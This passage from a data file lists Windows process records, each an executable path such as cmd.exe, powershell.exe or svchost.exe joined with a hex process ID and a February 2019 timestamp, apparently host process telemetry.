21:56:28.237000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0xcac2019-02-09 21:56:28.237000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0xcac2019-02-09 21:56:28.237000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0xcac2019-02-09 21:56:28.237000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0xcac2019-02-09 21:56:28.237000\",\"c:\\\\windows\\\\system32\\\\windowspowershell\\\\v1.0\\\\powershell.exe0xd602019-02-09 21:56:45.653000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0x15882019-02-09 21:56:46.413000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0x15882019-02-09 21:56:46.413000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0x15882019-02-09 21:56:46.413000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0x15882019-02-09 21:56:46.413000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0x15882019-02-09 21:56:46.413000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0x15882019-02-09 21:56:46.413000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0x15882019-02-09 21:56:46.413000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0x15882019-02-09 21:56:46.413000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0x15882019-02-09 21:56:46.413000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0x15882019-02-09 21:56:46.413000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0x15882019-02-09 21:56:46.413000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0x15882019-02-09 21:56:46.413000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0x15882019-02-09 21:56:46.413000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0x15882019-02-09 21:56:46.413000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0xcac2019-02-09 21:56:28.237000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0xcac2019-02-09 21:56:28.237000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0xcac2019-02-09 21:56:28.237000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0xcac2019-02-09 21:56:28.237000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0xcac2019-02-09 21:56:28.237000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0xcac2019-02-09 21:56:28.237000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0xcac2019-02-09 21:56:28.237000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0xcac2019-02-09 21:56:28.237000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0xcac2019-02-09 21:56:28.237000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0xcac2019-02-09 21:56:28.237000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0xcac2019-02-09 21:56:28.237000\",\"c:\\\\windows\\\\system32\\\\svchost.exe0xb3c1970-01-01 00:00:00.000000\",\"c:\\\\windows\\\\system32\\\\svchost.exe0xb3c1970-01-01 00:00:00.000000\",\"c:\\\\windows\\\\system32\\\\svchost.exe0xb3c1970-01-01 00:00:00.000000\",\"c:\\\\windows\\\\system32\\\\appidcertstorecheck.exe0x17702019-02-10 01:48:41.643000\",\"c:\\\\windows\\\\system32\\\\svchost.exe0xb3c1970-01-01 00:00:00.000000\",\"c:\\\\windows\\\\system32\\\\svchost.exe0xb3c1970-01-01 00:00:00.000000\",\"c:\\\\windows\\\\system32\\\\svchost.exe0xb3c1970-01-01 00:00:00.000000\",\"c:\\\\windows\\\\system32\\\\svchost.exe0xb3c1970-01-01 00:00:00.000000\",\"c:\\\\windows\\\\system32\\\\usoclient.exe0x53c2019-02-10 03:06:45.883000\",\"c:\\\\windows\\\\system32\\\\svchost.exe0xb3c1970-01-01 00:00:00.000000\",\"c:\\\\windows\\\\system32\\\\svchost.exe0xb3c1970-01-01 00:00:00.000000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0x11dc2019-02-10 03:44:47.243000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0x11dc2019-02-10 03:44:47.243000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0x11dc2019-02-10 03:44:47.243000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0x11dc2019-02-10 03:44:47.243000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0x11dc2019-02-10 03:44:47.243000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0x11dc2019-02-10 03:44:47.243000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0x11dc2019-02-10 03:44:47.243000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0x11dc2019-02-10 03:44:47.243000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0x11dc2019-02-10 03:44:47.243000\",\"c:\\\\windows\\\\system32\\\\windowspowershell\\\\v1.0\\\\powershell.exe0x16e82019-02-10 03:45:32.930000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0x212c2019-02-10 03:45:33.703000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0x212c2019-02-10 03:45:33.703000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0x212c2019-02-10 03:45:33.703000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0x212c2019-02-10 03:45:33.703000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0x212c2019-02-10 03:45:33.703000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0x212c2019-02-10 03:45:33.703000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0x212c2019-02-10 03:45:33.703000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0x212c2019-02-10 03:45:33.703000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0x212c2019-02-10 03:45:33.703000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0x212c2019-02-10 03:45:33.703000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0x212c2019-02-10 03:45:33.703000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0x212c2019-02-10 03:45:33.703000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0x212c2019-02-10 03:45:33.703000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0x212c2019-02-10 03:45:33.703000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0x212c2019-02-10 03:45:33.703000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0x212c2019-02-10 03:45:33.703000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0x11dc2019-02-10 03:44:47.243000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0x11dc2019-02-10 03:44:47.243000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0x11dc2019-02-10 03:44:47.243000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0x11dc2019-02-10 03:44:47.243000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0x11dc2019-02-10 03:44:47.243000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0x11dc2019-02-10 03:44:47.243000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0x11dc2019-02-10 03:44:47.243000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0x11dc2019-02-10 03:44:47.243000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0x11dc2019-02-10 03:44:47.243000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0x11dc2019-02-10 03:44:47.243000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0x11dc2019-02-10 03:44:47.243000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0x11dc2019-02-10 03:44:47.243000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0x11dc2019-02-10 03:44:47.243000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0x11dc2019-02-10 03:44:47.243000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0x11dc2019-02-10 03:44:47.243000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0x11dc2019-02-10 03:44:47.243000\",\"c:\\\\windows\\\\system32\\\\windowspowershell\\\\v1.0\\\\powershell.exe0x21b02019-02-10 03:47:36.837000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0x4942019-02-10 03:47:37.640000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0x4942019-02-10 03:47:37.640000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0x4942019-02-10 03:47:37.640000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0x4942019-02-10 03:47:37.640000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0x4942019-02-10 03:47:37.640000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0x4942019-02-10 03:47:37.640000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0x4942019-02-10 03:47:37.640000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0x4942019-02-10 03:47:37.640000\",\"c:\\\\windows\\\\system32\\\\windowspowershell\\\\v1.0\\\\powershell.exe0x1f7c2019-02-10 03:48:48.320000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0x22742019-02-10 03:48:49.100000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0x22742019-02-10 03:48:49.100000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0x22742019-02-10 03:48:49.100000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0x22742019-02-10 03:48:49.100000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0x22742019-02-10 03:48:49.100000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0x22742019-02-10 03:48:49.100000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0x22742019-02-10 03:48:49.100000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0x22742019-02-10 03:48:49.100000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0x22742019-02-10 03:48:49.100000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0x22742019-02-10 03:48:49.100000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0x22742019-02-10 03:48:49.100000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0x22742019-02-10 03:48:49.100000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0x22742019-02-10 03:48:49.100000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0x22742019-02-10 03:48:49.100000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0x4942019-02-10 03:47:37.640000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0x4942019-02-10 03:47:37.640000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0x4942019-02-10 03:47:37.640000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0x4942019-02-10 03:47:37.640000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0x4942019-02-10 03:47:37.640000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0x4942019-02-10 03:47:37.640000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0x4942019-02-10 03:47:37.640000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0x4942019-02-10 03:47:37.640000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0x4942019-02-10 03:47:37.640000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0x4942019-02-10 03:47:37.640000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0x4942019-02-10 03:47:37.640000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0x4942019-02-10 03:47:37.640000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0x4942019-02-10 03:47:37.640000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0x4942019-02-10 03:47:37.640000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0x4942019-02-10 03:47:37.640000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0x4942019-02-10 03:47:37.640000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0x4942019-02-10 03:47:37.640000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0x4942019-02-10 03:47:37.640000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0x4942019-02-10 03:47:37.640000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0x4942019-02-10 03:47:37.640000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0x4942019-02-10 03:47:37.640000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0x4942019-02-10 03:47:37.640000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0x11dc2019-02-10 03:44:47.243000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0x11dc2019-02-10 03:44:47.243000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0x11dc2019-02-10 03:44:47.243000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0x11dc2019-02-10 03:44:47.243000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0x11dc2019-02-10 03:44:47.243000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0x11dc2019-02-10 03:44:47.243000\",\"c:\\\\windows\\\\system32\\\\svchost.exe0xb3c1970-01-01 00:00:00.000000\",\"c:\\\\windows\\\\system32\\\\devicecensus.exe0x14542019-02-10 04:08:29.150000\",\"c:\\\\windows\\\\system32\\\\devicecensus.exe0x14542019-02-10 04:08:29.150000\",\"c:\\\\windows\\\\system32\\\\devicecensus.exe0x18442019-02-10 04:08:35.177000\",\"c:\\\\windows\\\\system32\\\\svchost.exe0xb3c1970-01-01 00:00:00.000000\",\"c:\\\\windows\\\\system32\\\\svchost.exe0xb3c1970-01-01 00:00:00.000000\",\"c:\\\\windows\\\\system32\\\\compattelrunner.exe0x1ef42019-02-10 04:32:15.793000\",\"c:\\\\windows\\\\system32\\\\svchost.exe0xb3c1970-01-01 00:00:00.000000\",\"c:\\\\programdata\\\\microsoft\\\\windows defender\\\\platform\\\\4.18.1812.3-0\\\\mpcmdrun.exe0x1d3c2019-02-10 05:10:21.810000\",\"c:\\\\windows\\\\system32\\\\svchost.exe0xb3c1970-01-01 00:00:00.000000\",\"c:\\\\windows\\\\system32\\\\svchost.exe0xb3c1970-01-01 00:00:00.000000\",\"c:\\\\windows\\\\system32\\\\svchost.exe0xb3c1970-01-01 00:00:00.000000\",\"c:\\\\windows\\\\system32\\\\svchost.exe0xb3c1970-01-01 00:00:00.000000\",\"c:\\\\windows\\\\system32\\\\svchost.exe0xb3c1970-01-01 00:00:00.000000\",\"c:\\\\windows\\\\system32\\\\svchost.exe0xb3c1970-01-01 00:00:00.000000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0x13e02019-02-10 06:44:47.247000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0x13e02019-02-10 06:44:47.247000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0x13e02019-02-10 06:44:47.247000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0x13e02019-02-10 06:44:47.247000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0x13e02019-02-10 06:44:47.247000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0x13e02019-02-10 06:44:47.247000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0x13e02019-02-10 06:44:47.247000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0x13e02019-02-10 06:44:47.247000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0x13e02019-02-10 06:44:47.247000\",\"c:\\\\windows\\\\system32\\\\windowspowershell\\\\v1.0\\\\powershell.exe0x5942019-02-10 06:45:21.867000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0x17e02019-02-10 06:45:22.657000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0x17e02019-02-10 06:45:22.657000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0x17e02019-02-10 06:45:22.657000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0x17e02019-02-10 06:45:22.657000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0x17e02019-02-10 06:45:22.657000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0x17e02019-02-10 06:45:22.657000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0x17e02019-02-10 06:45:22.657000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0x17e02019-02-10 06:45:22.657000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0x17e02019-02-10 06:45:22.657000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0x17e02019-02-10 06:45:22.657000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0x17e02019-02-10 06:45:22.657000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0x17e02019-02-10 06:45:22.657000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0x17e02019-02-10 06:45:22.657000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0x17e02019-02-10 06:45:22.657000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0x17e02019-02-10 06:45:22.657000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0x17e02019-02-10 06:45:22.657000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0x13e02019-02-10 06:44:47.247000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0x13e02019-02-10 06:44:47.247000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0x13e02019-02-10 06:44:47.247000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0x13e02019-02-10 06:44:47.247000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0x13e02019-02-10 06:44:47.247000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0x13e02019-02-10 06:44:47.247000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0x13e02019-02-10 06:44:47.247000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0x13e02019-02-10 06:44:47.247000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0x13e02019-02-10 06:44:47.247000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0x13e02019-02-10 06:44:47.247000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0x13e02019-02-10 06:44:47.247000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0x13e02019-02-10 06:44:47.247000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0x13e02019-02-10 06:44:47.247000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0x13e02019-02-10 06:44:47.247000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0x13e02019-02-10 06:44:47.247000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0x13e02019-02-10 06:44:47.247000\",\"c:\\\\windows\\\\system32\\\\windowspowershell\\\\v1.0\\\\powershell.exe0x23d82019-02-10 06:47:24.843000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0x14802019-02-10 06:47:25.650000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0x14802019-02-10 06:47:25.650000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0x14802019-02-10 06:47:25.650000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0x14802019-02-10 06:47:25.650000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0x14802019-02-10 06:47:25.650000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0x14802019-02-10 06:47:25.650000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0x14802019-02-10 06:47:25.650000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0x14802019-02-10 06:47:25.650000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0x14802019-02-10 06:47:25.650000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0x14802019-02-10 06:47:25.650000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0x14802019-02-10 06:47:25.650000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0x14802019-02-10 06:47:25.650000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0x14802019-02-10 06:47:25.650000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0x14802019-02-10 06:47:25.650000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0x14802019-02-10 06:47:25.650000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0x14802019-02-10 06:47:25.650000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0x14802019-02-10 06:47:25.650000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0x14802019-02-10 06:47:25.650000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0x14802019-02-10 06:47:25.650000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0x14802019-02-10 06:47:25.650000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0x14802019-02-10 06:47:25.650000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0x14802019-02-10 06:47:25.650000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0x14802019-02-10 06:47:25.650000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0x14802019-02-10 06:47:25.650000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0x14802019-02-10 06:47:25.650000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0x14802019-02-10 06:47:25.650000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0x14802019-02-10 06:47:25.650000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0x14802019-02-10 06:47:25.650000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0x14802019-02-10 06:47:25.650000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0x14802019-02-10 06:47:25.650000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0x13e02019-02-10 06:44:47.247000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0x13e02019-02-10 06:44:47.247000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0x13e02019-02-10 06:44:47.247000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0x13e02019-02-10 06:44:47.247000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0x13e02019-02-10 06:44:47.247000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0x13e02019-02-10 06:44:47.247000\",\"c:\\\\windows\\\\system32\\\\svchost.exe0xb3c1970-01-01 00:00:00.000000\",\"c:\\\\windows\\\\system32\\\\svchost.exe0xb3c1970-01-01 00:00:00.000000\",\"c:\\\\windows\\\\system32\\\\svchost.exe0xb3c1970-01-01 00:00:00.000000\",\"c:\\\\windows\\\\system32\\\\svchost.exe0xb3c1970-01-01 00:00:00.000000\",\"c:\\\\windows\\\\system32\\\\appidcertstorecheck.exe0x6342019-02-10 09:13:15.373000\",\"c:\\\\windows\\\\system32\\\\svchost.exe0xb3c1970-01-01 00:00:00.000000\",\"c:\\\\windows\\\\system32\\\\svchost.exe0xb3c1970-01-01 00:00:00.000000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0x1b502019-02-10 09:44:47.247000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0x1b502019-02-10 09:44:47.247000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0x1b502019-02-10 09:44:47.247000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0x1b502019-02-10 09:44:47.247000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0x1b502019-02-10 09:44:47.247000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0x1b502019-02-10 09:44:47.247000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0x1b502019-02-10 09:44:47.247000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0x1b502019-02-10 09:44:47.247000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0x1b502019-02-10 09:44:47.247000\",\"c:\\\\windows\\\\system32\\\\windowspowershell\\\\v1.0\\\\powershell.exe0x12e02019-02-10 09:45:45.050000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0xe002019-02-10 09:45:45.963000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0xe002019-02-10 09:45:45.963000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0xe002019-02-10 09:45:45.963000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0xe002019-02-10 09:45:45.963000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0xe002019-02-10 09:45:45.963000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0xe002019-02-10 09:45:45.963000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0xe002019-02-10 09:45:45.963000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0xe002019-02-10 09:45:45.963000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0xe002019-02-10 09:45:45.963000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0xe002019-02-10 09:45:45.963000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0xe002019-02-10 09:45:45.963000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0xe002019-02-10 09:45:45.963000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0xe002019-02-10 09:45:45.963000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0xe002019-02-10 09:45:45.963000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0xe002019-02-10 09:45:45.963000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0xe002019-02-10 09:45:45.963000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0x1b502019-02-10 09:44:47.247000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0x1b502019-02-10 09:44:47.247000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0x1b502019-02-10 09:44:47.247000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0x1b502019-02-10 09:44:47.247000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0x1b502019-02-10 09:44:47.247000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0x1b502019-02-10 09:44:47.247000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0x1b502019-02-10 09:44:47.247000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0x1b502019-02-10 09:44:47.247000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0x1b502019-02-10 09:44:47.247000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0x1b502019-02-10 09:44:47.247000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0x1b502019-02-10 09:44:47.247000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0x1b502019-02-10 09:44:47.247000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0x1b502019-02-10 09:44:47.247000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0x1b502019-02-10 09:44:47.247000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0x1b502019-02-10 09:44:47.247000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0x1b502019-02-10 09:44:47.247000\",\"c:\\\\windows\\\\system32\\\\windowspowershell\\\\v1.0\\\\powershell.exe0x1f602019-02-10 09:47:17.517000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0xe082019-02-10 09:47:18.343000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0xe082019-02-10 09:47:18.343000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0xe082019-02-10 09:47:18.343000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0xe082019-02-10 09:47:18.343000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0xe082019-02-10 09:47:18.343000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0xe082019-02-10 09:47:18.343000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0xe082019-02-10 09:47:18.343000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0xe082019-02-10 09:47:18.343000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0xe082019-02-10 09:47:18.343000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0xe082019-02-10 09:47:18.343000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0xe082019-02-10 09:47:18.343000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0xe082019-02-10 09:47:18.343000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0xe082019-02-10 09:47:18.343000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0xe082019-02-10 09:47:18.343000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0xe082019-02-10 09:47:18.343000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0xe082019-02-10 09:47:18.343000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0xe082019-02-10 09:47:18.343000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0xe082019-02-10 09:47:18.343000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0xe082019-02-10 09:47:18.343000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0xe082019-02-10 09:47:18.343000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0xe082019-02-10 09:47:18.343000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0xe082019-02-10 09:47:18.343000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0xe082019-02-10 09:47:18.343000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0xe082019-02-10 09:47:18.343000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0xe082019-02-10 09:47:18.343000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0xe082019-02-10 09:47:18.343000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0xe082019-02-10 09:47:18.343000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0xe082019-02-10 09:47:18.343000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0xe082019-02-10 09:47:18.343000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0xe082019-02-10 09:47:18.343000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0x1b502019-02-10 09:44:47.247000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0x1b502019-02-10 09:44:47.247000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0x1b502019-02-10 09:44:47.247000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0x1b502019-02-10 09:44:47.247000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0x1b502019-02-10 09:44:47.247000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0x1b502019-02-10 09:44:47.247000\",\"c:\\\\windows\\\\system32\\\\svchost.exe0xb3c1970-01-01 